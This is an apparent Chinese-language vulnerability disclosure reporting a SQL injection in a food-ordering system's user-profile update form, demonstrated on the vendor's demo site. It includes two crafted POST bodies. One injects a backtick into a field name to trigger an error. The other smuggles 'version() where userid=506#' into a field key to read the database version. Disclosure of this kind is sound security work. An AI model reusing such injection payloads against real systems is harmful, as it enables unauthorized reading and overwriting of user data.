### 简要描述:
rt
### 详细说明:
老问题了,订餐系统与企业管理系统 有着相似的地方。。于是就找到了一处注入。
官网演示。
注册用户后,修改资料。
[<img src="https://images.seebug.org/upload/201501/22180224bf0d181c9fb1ba03c3c534b051db40ef.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/22180224bf0d181c9fb1ba03c3c534b051db40ef.png)
改包 ,字段处加个 `
```
fields%5Btitle%5D=a&fields%5Btruename%5D=a&fields%5Btelephone%5D=a&fields%5Baddress%5D=a&fields%5Bcont`ent%5D=a&verifycode=1adf&submit=+%E6%8F%90+%E4%BA%A4+
```
[<img src="https://images.seebug.org/upload/201501/2218025364458063739c2ebd97e8f0eace381984.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2218025364458063739c2ebd97e8f0eace381984.png)
发现 报错了
[<img src="https://images.seebug.org/upload/201501/221803273852764165f29928e09099c7c9b41233.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/221803273852764165f29928e09099c7c9b41233.png)
```
fields%5Bthumb%5D=&fields%5Btruename%5D=&fields%5Bsex%5D=%E7%94%B7&fields%5Bemail%3dversion() where userid%3d506%23%5D=aaaaaa%40qq.com&fields%5Baddress%5D=&gourl=
```
成功注入出 数据库版本。
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201501/221803273852764165f29928e09099c7c9b41233.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/221803273852764165f29928e09099c7c9b41233.png)
暂无评论